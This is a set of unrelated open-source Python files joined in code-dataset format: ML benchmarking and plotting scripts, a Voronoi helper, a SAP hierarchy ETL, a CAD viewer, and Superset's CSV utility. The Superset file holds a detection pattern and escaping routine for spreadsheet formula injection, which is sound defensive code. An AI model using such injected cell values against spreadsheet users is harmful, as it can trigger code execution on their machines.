    runtimes = np.zeros(n_instances, dtype=float)
    for i in range(n_instances):
        instance = X_test[i, :]
        start = time.time()
        estimator.predict(instance)
        runtimes[i] = time.time() - start
    if verbose:
        print("atomic_benchmark runtimes:", min(runtimes), scoreatpercentile(
            runtimes, 50), max(runtimes))
    return runtimes
def bulk_benchmark_estimator(estimator, X_test, n_bulk_repeats, verbose):
    """Measure the per-instance runtime of predicting the whole input at once.

    Parameters
    ----------
    estimator : fitted estimator supporting ``predict()``
    X_test : array, shape (n_instances, n_features)
        Test inputs predicted in a single call per repeat.
    n_bulk_repeats : int
        How many times to repeat the bulk prediction.
    verbose : bool
        When True, print min / median / max runtimes.

    Returns
    -------
    runtimes : np.ndarray of float64, shape (n_bulk_repeats,)
        Per-instance latency (bulk runtime / n_instances) in seconds.
    """
    n_instances = X_test.shape[0]
    # BUG FIX: the np.float alias was removed in NumPy 1.24; the builtin
    # float produces the same float64 dtype on every NumPy version.
    runtimes = np.zeros(n_bulk_repeats, dtype=float)
    for i in range(n_bulk_repeats):
        start = time.time()
        estimator.predict(X_test)
        runtimes[i] = time.time() - start
    # Normalize each bulk runtime to a per-instance cost (vectorized
    # equivalent of the former map/lambda division).
    runtimes = runtimes / float(n_instances)
    if verbose:
        print("bulk_benchmark runtimes:", min(runtimes), scoreatpercentile(
            runtimes, 50), max(runtimes))
    return runtimes
def benchmark_estimator(estimator, X_test, n_bulk_repeats=30, verbose=False):
    """
    Measure runtimes of prediction in both atomic and bulk mode.

    Parameters
    ----------
    estimator : already trained estimator supporting `predict()`
    X_test : test input
    n_bulk_repeats : how many times to repeat when evaluating bulk mode

    Returns
    -------
    atomic_runtimes, bulk_runtimes : a pair of `np.array` which contain the
        runtimes in seconds.
    """
    return (atomic_benchmark_estimator(estimator, X_test, verbose),
            bulk_benchmark_estimator(estimator, X_test, n_bulk_repeats,
                                     verbose))
def generate_dataset(n_train, n_test, n_features, noise=0.1, verbose=False):
    """Generate a standardized regression dataset with the given sizes."""
    if verbose:
        print("generating dataset...")

    X, y, coef = make_regression(n_samples=n_train + n_test,
                                 n_features=n_features, noise=noise,
                                 coef=True)

    X_train, X_test = X[:n_train], X[n_train:]
    y_train, y_test = y[:n_train], y[n_train:]

    # Shuffle the training split reproducibly.
    idx = np.arange(n_train)
    np.random.seed(13)
    np.random.shuffle(idx)
    X_train, y_train = X_train[idx], y_train[idx]

    # Standardize features using statistics of the training split only.
    std = X_train.std(axis=0)
    mean = X_train.mean(axis=0)
    X_train = (X_train - mean) / std
    X_test = (X_test - mean) / std

    # Standardize targets the same way.
    std = y_train.std(axis=0)
    mean = y_train.mean(axis=0)
    y_train = (y_train - mean) / std
    y_test = (y_test - mean) / std

    gc.collect()
    if verbose:
        print("ok")
    return X_train, y_train, X_test, y_test
def boxplot_runtimes(runtimes, pred_type, configuration):
    """
    Plot a new `Figure` with boxplots of prediction runtimes.

    Parameters
    ----------
    runtimes : list of `np.array` of latencies in micro-seconds
    pred_type : 'bulk' or 'atomic'
    configuration : dict describing the benchmark; its 'estimators'
        entries supply the x-axis labels
    """
    fig, ax1 = plt.subplots(figsize=(10, 6))
    bp = plt.boxplot(runtimes, )
    # One label per estimator: name plus its complexity measure.
    cls_infos = ['%s\n(%d %s)' % (estimator_conf['name'],
                                  estimator_conf['complexity_computer'](
                                      estimator_conf['instance']),
                                  estimator_conf['complexity_label']) for
                 estimator_conf in configuration['estimators']]
    plt.setp(ax1, xticklabels=cls_infos)
    plt.setp(bp['boxes'], color='black')
    plt.setp(bp['whiskers'], color='black')
    plt.setp(bp['fliers'], color='red', marker='+')
    ax1.yaxis.grid(True, linestyle='-', which='major', color='lightgrey',
                   alpha=0.5)
    ax1.set_axisbelow(True)
    ax1.set_title('Prediction Time per Instance - %s, %d feats.' % (
        pred_type.capitalize(),
        configuration['n_features']))
    ax1.set_ylabel('Prediction Time (us)')
    plt.show()
def benchmark(configuration):
    """Run the whole benchmark.

    Generates the dataset, fits every configured estimator, measures
    atomic and bulk prediction latencies, and renders one boxplot per
    prediction mode.
    """
    X_train, y_train, X_test, y_test = generate_dataset(
        configuration['n_train'], configuration['n_test'],
        configuration['n_features'])
    stats = {}
    for estimator_conf in configuration['estimators']:
        print("Benchmarking", estimator_conf['instance'])
        estimator_conf['instance'].fit(X_train, y_train)
        gc.collect()
        a, b = benchmark_estimator(estimator_conf['instance'], X_test)
        stats[estimator_conf['name']] = {'atomic': a, 'bulk': b}
    cls_names = [estimator_conf['name'] for estimator_conf in configuration[
        'estimators']]
    # Convert seconds to micro-seconds for plotting.
    runtimes = [1e6 * stats[clf_name]['atomic'] for clf_name in cls_names]
    boxplot_runtimes(runtimes, 'atomic', configuration)
    runtimes = [1e6 * stats[clf_name]['bulk'] for clf_name in cls_names]
    boxplot_runtimes(runtimes, 'bulk (%d)' % configuration['n_test'],
                     configuration)
def n_feature_influence(estimators, n_train, n_test, n_features, percentile):
    """
    Estimate influence of the number of features on prediction time.

    Parameters
    ----------
    estimators : dict of (name (str), estimator) to benchmark
    n_train : nber of training instances (int)
    n_test : nber of testing instances (int)
    n_features : list of feature-space dimensionality to test (int)
    percentile : percentile at which to measure the speed (int [0-100])

    Returns
    -------
    percentiles : dict(estimator_name,
                       dict(n_features, percentile_perf_in_us))
    """
    percentiles = defaultdict(defaultdict)
    for n in n_features:
        print("benchmarking with %d features" % n)
        X_train, y_train, X_test, y_test = generate_dataset(n_train, n_test, n)
        for cls_name, estimator in estimators.items():
            estimator.fit(X_train, y_train)
            gc.collect()
            # 30 non-verbose bulk repeats; converted to micro-seconds below.
            runtimes = bulk_benchmark_estimator(estimator, X_test, 30, False)
            percentiles[cls_name][n] = 1e6 * scoreatpercentile(runtimes,
                                                               percentile)
    return percentiles
def plot_n_features_influence(percentiles, percentile):
    """Plot the latency percentile as a function of the number of features."""
    fig, ax1 = plt.subplots(figsize=(10, 6))
    # NOTE(review): only three colors are defined, so presumably at most
    # three estimators are ever plotted -- confirm before adding more.
    colors = ['r', 'g', 'b']
    for i, cls_name in enumerate(percentiles.keys()):
        x = np.array(sorted([n for n in percentiles[cls_name].keys()]))
        y = np.array([percentiles[cls_name][n] for n in x])
        plt.plot(x, y, color=colors[i], )
    ax1.yaxis.grid(True, linestyle='-', which='major', color='lightgrey',
                   alpha=0.5)
    ax1.set_axisbelow(True)
    ax1.set_title('Evolution of Prediction Time with #Features')
    ax1.set_xlabel('#Features')
    ax1.set_ylabel('Prediction Time at %d%%-ile (us)' % percentile)
    plt.show()
def benchmark_throughputs(configuration, duration_secs=0.1):
    """Benchmark prediction throughput (predictions per second).

    Each configured estimator repeatedly predicts a single instance for
    ``duration_secs`` wall-clock seconds.

    Parameters
    ----------
    configuration : dict describing dataset sizes and the estimators
    duration_secs : float
        Measurement window per estimator.

    Returns
    -------
    throughputs : dict mapping estimator name to predictions/second
    """
    X_train, y_train, X_test, y_test = generate_dataset(
        configuration['n_train'], configuration['n_test'],
        configuration['n_features'])
    throughputs = dict()
    for estimator_config in configuration['estimators']:
        estimator_config['instance'].fit(X_train, y_train)
        start_time = time.time()
        n_predictions = 0
        while (time.time() - start_time) < duration_secs:
            # X_test[[0]] keeps the sample 2-D: predict() on a 1-D row is
            # rejected by scikit-learn (since 0.19).
            estimator_config['instance'].predict(X_test[[0]])
            n_predictions += 1
        throughputs[estimator_config['name']] = n_predictions / duration_secs
    return throughputs
def plot_benchmark_throughput(throughputs, configuration):
    """Bar plot of predictions/second for each configured estimator."""
    fig, ax = plt.subplots(figsize=(10, 6))
    colors = ['r', 'g', 'b']
    # Label each bar with the estimator name and its complexity measure.
    cls_infos = ['%s\n(%d %s)' % (estimator_conf['name'],
                                  estimator_conf['complexity_computer'](
                                      estimator_conf['instance']),
                                  estimator_conf['complexity_label']) for
                 estimator_conf in configuration['estimators']]
    cls_values = [throughputs[estimator_conf['name']] for estimator_conf in
                  configuration['estimators']]
    plt.bar(range(len(throughputs)), cls_values, width=0.5, color=colors)
    ax.set_xticks(np.linspace(0.25, len(throughputs) - 0.75, len(throughputs)))
    ax.set_xticklabels(cls_infos, fontsize=10)
    # Leave 20% headroom above the tallest bar.
    ymax = max(cls_values) * 1.2
    ax.set_ylim((0, ymax))
    ax.set_ylabel('Throughput (predictions/sec)')
    ax.set_title('Prediction Throughput for different estimators (%d '
                 'features)' % configuration['n_features'])
    plt.show()
###############################################################################
# main code
start_time = time.time()
# benchmark bulk/atomic prediction speed for various regressors
configuration = {
    'n_train': int(1e3),
    'n_test': int(1e2),
    'n_features': int(1e2),
    # Each entry carries a 'complexity_computer' that maps the fitted
    # instance to the scalar shown in the plot labels.
    'estimators': [
        {'name': 'Linear Model',
         'instance': SGDRegressor(penalty='elasticnet', alpha=0.01,
                                  l1_ratio=0.25, fit_intercept=True),
         'complexity_label': 'non-zero coefficients',
         'complexity_computer': lambda clf: np.count_nonzero(clf.coef_)},
        {'name': 'RandomForest',
         'instance': RandomForestRegressor(),
         'complexity_label': 'estimators',
         'complexity_computer': lambda clf: clf.n_estimators},
        {'name': 'SVR',
         'instance': SVR(kernel='rbf'),
         'complexity_label': 'support vectors',
         'complexity_computer': lambda clf: len(clf.support_vectors_)},
    ]
}
benchmark(configuration)
# benchmark n_features influence on prediction speed
percentile = 90
percentiles = n_feature_influence({'ridge': Ridge()},
                                  configuration['n_train'],
                                  configuration['n_test'],
                                  [100, 250, 500], percentile)
plot_n_features_influence(percentiles, percentile)
# benchmark throughput
throughputs = benchmark_throughputs(configuration)
plot_benchmark_throughput(throughputs, configuration)
stop_time = time.time()
print("example run in %.2fs" % (stop_time - start_time))
| bsd-3-clause |
mistercrunch/panoramix | superset/utils/csv.py | 2 | 3022 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import re
import urllib.request
from typing import Any, Dict, Optional
from urllib.error import URLError
import pandas as pd
negative_number_re = re.compile(r"^-[0-9.]+$")
# Matches strings a spreadsheet may interpret as a formula, i.e. strings
# that start with:
#
# 1. one of -, @, +, |, =, %
# 2. two double quotes immediately followed by one of -, @, +, |, =, %
# 3. one or more spaces immediately followed by one of -, @, +, |, =, %
#
problematic_chars_re = re.compile(r'^(?:"{2}|\s{1,})(?=[\-@+|=%])|^[\-@+|=%]')
def escape_value(value: str) -> str:
    """
    Neutralize strings that could trigger CSV/formula injection.

    http://georgemauer.net/2017/10/07/csv-injection.html
    """
    looks_dangerous = problematic_chars_re.match(value) is not None
    # Plain negative numbers start with '-' but are harmless data.
    if not looks_dangerous or negative_number_re.match(value) is not None:
        return value
    # Escape pipe to be extra safe: it can lead to remote code execution
    # in some spreadsheet software.
    escaped = value.replace("|", "\\|")
    # A leading single quote prevents evaluation and is hidden visually by
    # many spreadsheet applications.  A leading space is NOT reliable:
    # when uploading a csv file, Google Sheets ignores a leading space and
    # still evaluates the cell.
    return "'" + escaped
def df_to_escaped_csv(df: pd.DataFrame, **kwargs: Any) -> Any:
    """Serialize *df* to CSV with every string header and cell escaped."""
    def _escape(cell: Any) -> Any:
        # Only strings can carry formula-injection payloads.
        return escape_value(cell) if isinstance(cell, str) else cell
    # Escape the headers, then every data cell, then let pandas serialize.
    escaped = df.rename(columns=_escape).applymap(_escape)
    return escaped.to_csv(**kwargs)
def get_chart_csv_data(
    chart_url: str, auth_cookies: Optional[Dict[str, str]] = None
) -> Optional[bytes]:
    """Fetch the CSV payload of a chart over HTTP.

    NOTE(review): the URL is only fetched when ``auth_cookies`` is
    provided; without cookies the function returns None without making
    any request -- confirm this is intentional.
    """
    content = None
    if auth_cookies:
        opener = urllib.request.build_opener()
        # Forward the authentication cookies as a single Cookie header.
        cookie_str = ";".join([f"{key}={val}" for key, val in auth_cookies.items()])
        opener.addheaders.append(("Cookie", cookie_str))
        response = opener.open(chart_url)
        content = response.read()
        # Any non-200 response is surfaced as a URLError.
        if response.getcode() != 200:
            raise URLError(response.getcode())
    if content:
        return content
    return None
| apache-2.0 |
jeffkinnison/awe-wq | lib/python2.7/site-packages/awe/voronoi.py | 2 | 3930 | #!/usr/bin/env python
# -----------------------------------------------------------------------------
# Voronoi diagram from a list of points
# Copyright (C) 2011 Nicolas P. Rougier
#
# Distributed under the terms of the BSD License.
# -----------------------------------------------------------------------------
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
from matplotlib.patches import Polygon
from matplotlib.collections import PatchCollection
def circumcircle(P1, P2, P3):
    '''
    Return the center (x, y) of the circle through P1, P2 and P3.
    If P1, P2 and P3 are colinear, return None.

    Adapted from:
    http://local.wasp.uwa.edu.au/~pbourke/geometry/circlefrom3/Circle.cpp
    '''
    eps = 0.000000001
    d_a = P2 - P1
    d_b = P3 - P2
    # Degenerate orientation (P1P2 near-vertical and P2P3 near-horizontal):
    # the center follows directly from the midpoints.
    if np.abs(d_a[0]) <= eps and np.abs(d_b[1]) <= eps:
        return 0.5 * (P2[0] + P3[0]), 0.5 * (P1[1] + P2[1])
    slope_a = d_a[1] / d_a[0]
    slope_b = d_b[1] / d_b[0]
    if np.abs(slope_a - slope_b) <= eps:
        # Equal slopes -> colinear points, no finite circumcircle.
        return None
    cx = (slope_a * slope_b * (P1[1] - P3[1]) + slope_b * (P1[0] + P2[0])
          - slope_a * (P2[0] + P3[0])) / (2. * (slope_b - slope_a))
    cy = -(cx - (P1[0] + P2[0]) / 2.) / slope_a + (P1[1] + P2[1]) / 2.
    return cx, cy
def voronoi(X,Y):
    ''' Return the polygonal cells of the Voronoi diagram of points (X, Y) '''
    P = np.zeros((X.size+4,2))
    P[:X.size,0], P[:Y.size,1] = X, Y
    # We add four points at (pseudo) "infinity" so every finite point gets
    # a bounded cell.
    m = max(np.abs(X).max(), np.abs(Y).max())*1e5
    P[X.size:,0] = -m, -m, +m, +m
    P[Y.size:,1] = -m, +m, -m, +m
    # Delaunay triangulation; the Voronoi vertices are its circumcenters.
    D = matplotlib.tri.Triangulation(P[:,0],P[:,1])
    T = D.triangles
    #axes = plt.subplot(1,1,1)
    #plt.scatter(X,Y, s=5)
    #patches = []
    #for i,triang in enumerate(T):
    #    polygon = Polygon(np.array([P[triang[0]],P[triang[1]],P[triang[2]]]))
    #    patches.append(polygon)
    #colors = 100*np.random.rand(len(patches))
    #p = PatchCollection(patches, cmap=matplotlib.cm.jet, alpha=0.4)
    #p.set_array(np.array(colors))
    #axes.add_collection(p)
    #plt.colorbar(p)
    ##lines = matplotlib.collections.LineCollection(segments, color='0.75')
    ##axes.add_collection(lines)
    #plt.axis([0,1,0,1])
    #plt.show()
    #plt.savefig('test0.png')
    # Circumcenter of each Delaunay triangle.
    # NOTE(review): circumcircle returns None for colinear triangles,
    # which would fail the assignment into C -- presumably random input
    # avoids exact colinearity; confirm.
    n = T.shape[0]
    C = np.zeros((n,2))
    for i in range(n):
        C[i] = circumcircle(P[T[i,0]],P[T[i,1]],P[T[i,2]])
    X,Y = C[:,0], C[:,1]
    #segments = []
    #for i in range(n):
    #    for k in D.neighbors[i]:
    #        if k != -1:
    #            segments.append([(X[i],Y[i]), (X[k],Y[k])])
    # Each point's cell collects the circumcenters of all triangles
    # incident to that point.
    cells = [[] for i in range(np.max(T)+1)]
    for i,triang in enumerate(T):
        cells[triang[0]].append([X[i],Y[i]])
        cells[triang[1]].append([X[i],Y[i]])
        cells[triang[2]].append([X[i],Y[i]])
    # Order each cell's vertices by angle around the generating point so
    # they form a proper polygon.
    for i,cell in enumerate(cells):
        angle = []
        for coord in cell:
            angle.append(np.arctan2((coord[1]-P[i,1]),(coord[0]-P[i,0])))
        id = np.argsort(-np.array(angle))
        cells[i] = np.array([cell[j] for j in id])
    return cells
# -----------------------------------------------------------------------------
if __name__ == '__main__':
    # Demo: Voronoi diagram of 256 random points in the unit square.
    P = np.random.random((2,256))
    X,Y = P[0],P[1]
    fig = plt.figure(figsize=(10,10))
    axes = plt.subplot(1,1,1)
    plt.scatter(X,Y, s=5)
    #segments = voronoi(X,Y)
    cells = voronoi(X,Y)
    patches = []
    for cell in cells:
        polygon = Polygon(cell,True)
        patches.append(polygon)
        #plt.scatter(cell[:,0],cell[:,1])
    colors = 100*np.random.rand(len(patches))
    # print() works in both Python 2 and 3; the previous statement form
    # ("print colors") is a SyntaxError under Python 3.
    print(colors)
    p = PatchCollection(patches, cmap=matplotlib.cm.jet, alpha=0.4)
    p.set_array(np.array(colors))
    axes.add_collection(p)
    plt.colorbar(p)
    #lines = matplotlib.collections.LineCollection(segments, color='0.75')
    #axes.add_collection(lines)
    plt.axis([0,1,0,1])
    plt.show()
    plt.savefig('test.png')
| gpl-2.0 |
plissonf/scikit-learn | examples/ensemble/plot_gradient_boosting_oob.py | 230 | 4762 | """
======================================
Gradient Boosting Out-of-Bag estimates
======================================
Out-of-bag (OOB) estimates can be a useful heuristic to estimate
the "optimal" number of boosting iterations.
OOB estimates are almost identical to cross-validation estimates but
they can be computed on-the-fly without the need for repeated model
fitting.
OOB estimates are only available for Stochastic Gradient Boosting
(i.e. ``subsample < 1.0``), the estimates are derived from the improvement
in loss based on the examples not included in the bootstrap sample
(the so-called out-of-bag examples).
The OOB estimator is a pessimistic estimator of the true
test loss, but remains a fairly good approximation for a small number of trees.
The figure shows the cumulative sum of the negative OOB improvements
as a function of the boosting iteration. As you can see, it tracks the test
loss for the first hundred iterations but then diverges in a
pessimistic way.
The figure also shows the performance of 3-fold cross validation which
usually gives a better estimate of the test loss
but is computationally more demanding.
"""
print(__doc__)
# Author: Peter Prettenhofer <peter.prettenhofer@gmail.com>
#
# License: BSD 3 clause
import numpy as np
import matplotlib.pyplot as plt
from sklearn import ensemble
from sklearn.cross_validation import KFold
from sklearn.cross_validation import train_test_split
# Generate data (adapted from G. Ridgeway's gbm example)
n_samples = 1000
random_state = np.random.RandomState(13)
x1 = random_state.uniform(size=n_samples)
x2 = random_state.uniform(size=n_samples)
x3 = random_state.randint(0, 4, size=n_samples)
# Bernoulli targets whose success probability depends on x1, x2, x3.
p = 1 / (1.0 + np.exp(-(np.sin(3 * x1) - 4 * x2 + x3)))
y = random_state.binomial(1, p, size=n_samples)
X = np.c_[x1, x2, x3]
X = X.astype(np.float32)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.5,
                                                    random_state=9)
# Fit classifier with out-of-bag estimates
params = {'n_estimators': 1200, 'max_depth': 3, 'subsample': 0.5,
          'learning_rate': 0.01, 'min_samples_leaf': 1, 'random_state': 3}
clf = ensemble.GradientBoostingClassifier(**params)
clf.fit(X_train, y_train)
acc = clf.score(X_test, y_test)
print("Accuracy: {:.4f}".format(acc))
n_estimators = params['n_estimators']
x = np.arange(n_estimators) + 1
def heldout_score(clf, X_test, y_test):
    """compute deviance scores on ``X_test`` and ``y_test``. """
    # One score per boosting stage; uses the module-level n_estimators.
    score = np.zeros((n_estimators,), dtype=np.float64)
    for i, y_pred in enumerate(clf.staged_decision_function(X_test)):
        score[i] = clf.loss_(y_test, y_pred)
    return score
def cv_estimate(n_folds=3):
    """Average held-out deviance over n_folds CV splits (uses globals)."""
    cv = KFold(n=X_train.shape[0], n_folds=n_folds)
    cv_clf = ensemble.GradientBoostingClassifier(**params)
    val_scores = np.zeros((n_estimators,), dtype=np.float64)
    for train, test in cv:
        cv_clf.fit(X_train[train], y_train[train])
        val_scores += heldout_score(cv_clf, X_train[test], y_train[test])
    val_scores /= n_folds
    return val_scores
# Estimate best n_estimator using cross-validation
cv_score = cv_estimate(3)
# Compute best n_estimator for test data
test_score = heldout_score(clf, X_test, y_test)
# negative cumulative sum of oob improvements
cumsum = -np.cumsum(clf.oob_improvement_)
# min loss according to OOB
oob_best_iter = x[np.argmin(cumsum)]
# min loss according to test (normalize such that first loss is 0)
test_score -= test_score[0]
test_best_iter = x[np.argmin(test_score)]
# min loss according to cv (normalize such that first loss is 0)
cv_score -= cv_score[0]
cv_best_iter = x[np.argmin(cv_score)]
# color brew for the three curves
oob_color = list(map(lambda x: x / 256.0, (190, 174, 212)))
test_color = list(map(lambda x: x / 256.0, (127, 201, 127)))
cv_color = list(map(lambda x: x / 256.0, (253, 192, 134)))
# plot curves and vertical lines for best iterations
plt.plot(x, cumsum, label='OOB loss', color=oob_color)
plt.plot(x, test_score, label='Test loss', color=test_color)
plt.plot(x, cv_score, label='CV loss', color=cv_color)
plt.axvline(x=oob_best_iter, color=oob_color)
plt.axvline(x=test_best_iter, color=test_color)
plt.axvline(x=cv_best_iter, color=cv_color)
# add three vertical lines to xticks
xticks = plt.xticks()
xticks_pos = np.array(xticks[0].tolist() +
                      [oob_best_iter, cv_best_iter, test_best_iter])
xticks_label = np.array(list(map(lambda t: int(t), xticks[0])) +
                        ['OOB', 'CV', 'Test'])
ind = np.argsort(xticks_pos)
xticks_pos = xticks_pos[ind]
xticks_label = xticks_label[ind]
plt.xticks(xticks_pos, xticks_label)
plt.legend(loc='upper right')
plt.ylabel('normalized loss')
plt.xlabel('number of iterations')
plt.show()
| bsd-3-clause |
rtogo/sap-cost-center-hierarchy | ksh3.py | 1 | 3297 | # -*- coding: utf-8 -*-
import logging
log = logging.getLogger(__name__)
import pandas as pd
import numpy as np
import os
import yaml
class ETL(object):
    """Extract and transform a SAP KSH3 cost-center hierarchy export.

    The tab-separated export encodes the hierarchy as an ASCII tree
    (dashes and pipes).  ``transform`` parses it and denormalizes it into
    a DataFrame with one (hierarquia, descricao) column pair per level.
    """

    def __init__(self, path, config_filename='de-para.yml'):
        # path: KSH3 export file; config_filename: YAML rename mapping.
        self.path = path
        self.config_filename = config_filename
        self.df = pd.DataFrame()
        self.profile = pd.DataFrame()
        self.extract()
        self.transform()
        self.quality_check()

    def extract(self):
        """Load the raw export and the YAML de->para configuration."""
        self.df = pd.read_csv(self.path, encoding='latin-1', sep='\t',
                              header=0, dtype=str)
        self.df.columns = ['SAP']
        with open(self.config_filename, encoding='utf-8') as stream:
            # safe_load: yaml.load without an explicit Loader is unsafe
            # and raises TypeError on modern PyYAML.
            self.config = yaml.safe_load(stream)

    def transform(self):
        """Parse the ASCII tree and denormalize it level by level."""
        # Split each row into indentation, code and description via regex
        # (raw string avoids invalid-escape warnings).
        self.df[['nivel', 'hierarquia', 'descricao']] = \
            self.df.SAP.str.extract(r'^([\s\-|]+)([\w\d\-]+)(\s{6}.+$|$)')
        self.df.drop('SAP', axis=1, inplace=True)
        # Drop rows where any field is null.
        self.df.dropna(axis=0, how='any', inplace=True)
        # Strip surrounding whitespace; empty descriptions become NaN.
        self.df.descricao = self.df.descricao.apply(lambda x: x.strip())
        self.df.descricao = self.df.descricao.apply(
            lambda x: np.nan if x == '' else x)
        # Drop the rows left without a description.
        self.df.dropna(subset=['descricao'], how='any', inplace=True)
        # The number of pipes in the indentation encodes the tree depth.
        self.df.nivel = self.df.nivel.apply(
            lambda x: str(x).count('|')).astype(np.int16)
        # Reset the index to a clean sequential number.
        self.df.reset_index(drop=True, inplace=True)
        # Rename hierarchies according to the de->para configuration file.
        for k, v in self.config['Hierarquia de centros de custo'].items():
            self.df.loc[self.df.hierarquia == k, 'descricao'] = v
        # Denormalize: copy each ancestor level onto its descendant rows.
        level_1 = None
        level_2 = None
        for i in self.df.index:
            row = self.df.loc[i].copy()
            # .ix was removed in pandas 1.0; after reset_index labels are
            # positional, so .loc is equivalent here.
            last_row = self.df.shift(1).loc[i].copy()
            if row['nivel'] == 1 and row['descricao'] != level_1:
                level_1 = row['descricao']
                # log.info(' > Lendo hierarquia {!r}'.format(row['descricao']))
            if row['nivel'] == 2 and row['descricao'] != level_2:
                level_2 = row['descricao']
                log.info(' > Lendo hierarquia {!s} :: {!s}'.
                         format(level_1, level_2))
            nivel_hierarquia = 'nivel_{!s}_hierarquia'.format(row['nivel'])
            nivel_descricao = 'nivel_{!s}_descricao'.format(row['nivel'])
            self.df.loc[i, nivel_hierarquia] = row['hierarquia']
            self.df.loc[i, nivel_descricao] = row['descricao']
            for l in range(1, row['nivel']):
                nivel_hierarquia = 'nivel_{!s}_hierarquia'.format(l)
                nivel_descricao = 'nivel_{!s}_descricao'.format(l)
                self.df.loc[i, nivel_hierarquia] = last_row[nivel_hierarquia]
                self.df.loc[i, nivel_descricao] = last_row[nivel_descricao]

    def quality_check(self):
        """Placeholder for data-quality validations."""
        pass
def parse(path):
    """Run the ETL pipeline on *path* and return the resulting DataFrame."""
    log.info('Importando ksh3')
    parser = ETL(path)
    return parser.df
| mit |
osv-team/osvcad | osvcad/view.py | 1 | 4586 | # coding: utf-8
r"""Visualization of Parts and Assemblies"""
from random import uniform, randint
import wx
import wx.aui
import wx.lib.agw.aui
import matplotlib.pyplot as plt
import networkx as nx
from OCC.Core.gp import gp_Pnt, gp_Vec
import ccad.display as cd
from aocutils.display.wx_viewer import Wx3dViewerFrame, colour_wx_to_occ
class OsvCadFrame(Wx3dViewerFrame):
    r"""Specialization of aocutil's Wx3dViewerFrame for OsvCad"""
    def __init__(self):
        Wx3dViewerFrame.__init__(self,
                                 title="OsvCad 3d viewer",
                                 welcome="Starting OsvCad 3d viewer ...")
    def display_part(self, part, color_255=None, transparency=0.):
        r"""Display a single Part (shape + anchors)

        Parameters
        ----------
        part : PartGeometryNode
        color_255 : tuple of integers from 0 to 255
            A random color is picked when None.
        transparency : float from 0 to 1
        """
        if color_255 is None:
            # Random color so successive parts remain distinguishable.
            color_255 = (randint(0, 255), randint(0, 255), randint(0, 255))
        # Draw every anchor as a vector at its position.
        for k, _ in part.anchors.items():
            self.wx_3d_viewer.display_vector(
                gp_Vec(*part.anchors[k]["direction"]),
                gp_Pnt(*part.anchors[k]["position"]))
        self.wx_3d_viewer.display_shape(part.node_shape.shape,
                                        color_=colour_wx_to_occ(color_255),
                                        transparency=transparency)
    def display_assembly(self, assembly, transparency=0.):
        r"""Display an assembly of parts and assemblies

        Each node is shown with its own random color; anchors are not
        displayed.

        Parameters
        ----------
        assembly : AssemblyGeometryNode
        transparency : float from 0 to 1
        """
        assembly.build()
        for node in assembly.nodes():
            # for k, v in node.anchors.items():
            #     frame.p.display_vector(gp_Vec(*node.anchors[k]["direction"]),
            #                            gp_Pnt(*node.anchors[k]["position"]))
            self.wx_3d_viewer.display_shape(node.node_shape.shape,
                                            color_=colour_wx_to_occ((randint(0, 255),
                                                                     randint(0, 255),
                                                                     randint(0, 255))),
                                            transparency=transparency)
# parts
def view_part(part, color_255=None, transparency=0.):
    r"""Display the node in a 3D viewer

    Starts a blocking wx main loop.

    Parameters
    ----------
    part : PartGeometryNode
    color_255 : Tuple[float, float, float]
        8-bit (0 - 255) color tuple; random when None
    transparency : float
        From 0. (not transparent) to 1 (fully transparent)
    """
    if color_255 is None:
        color_255 = (randint(0, 255), randint(0, 255), randint(0, 255))
    app = wx.App()
    frame = OsvCadFrame()
    frame.display_part(part, color_255, transparency)
    app.SetTopWindow(frame)
    app.MainLoop()
# assemblies
def view_assembly(assembly):
    r"""Display using osvcad's integrated wx viewer

    Builds the assembly, then starts a blocking wx main loop.
    """
    assembly.build()
    app = wx.App()
    frame = OsvCadFrame()
    frame.display_assembly(assembly)
    app.SetTopWindow(frame)
    app.MainLoop()
def view_assembly_graph(assembly):
    r"""Create a Matplotlib graph of the plot

    Parameters
    ----------
    assembly : AssemblyGeometryNode
    """
    # NOTE(review): these letter keys look like leftovers from a networkx
    # example; assembly nodes are unlikely to equal 'A'/'D'/'H', so every
    # node presumably gets the 0.25 default -- confirm.
    val_map = {'A': 1.0,
               'D': 0.5714285714285714,
               'H': 0.0}
    values = [val_map.get(node, 0.25) for node in assembly.nodes()]
    pos = nx.circular_layout(assembly)
    nx.draw_networkx_nodes(assembly,
                           pos,
                           cmap=plt.get_cmap('jet'),
                           node_color=values)
    nx.draw_networkx_edges(assembly,
                           pos,
                           edgelist=assembly.edges(),
                           edge_color='r',
                           arrows=True)
    nx.draw_networkx_labels(assembly, pos)
    nx.draw_networkx_edge_labels(assembly, pos)
    plt.show()
def view_assembly_ccad(assembly):
    r"""Display the Assembly in a the ccad 3D viewer

    Parameters
    ----------
    assembly : AssemblyGeometryNode
    """
    v = cd.view()
    assembly.build()
    # Each node is shown with a random color and no transparency.
    for node in assembly.nodes():
        v.display(node._node_shape,
                  color=(uniform(0, 1), uniform(0, 1), uniform(0, 1)),
                  transparency=0.)
    # v.display(assembly._node_shape,
    #           color=(uniform(0, 1), uniform(0, 1), uniform(0, 1)),
    #           transparency=0.)
    # Blocks until the ccad viewer window is closed.
    cd.start()
| gpl-3.0 |
aclifton/cpeg853-gem5 | util/dram_lat_mem_rd_plot.py | 13 | 5155 | #!/usr/bin/env python
# Copyright (c) 2015 ARM Limited
# All rights reserved
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
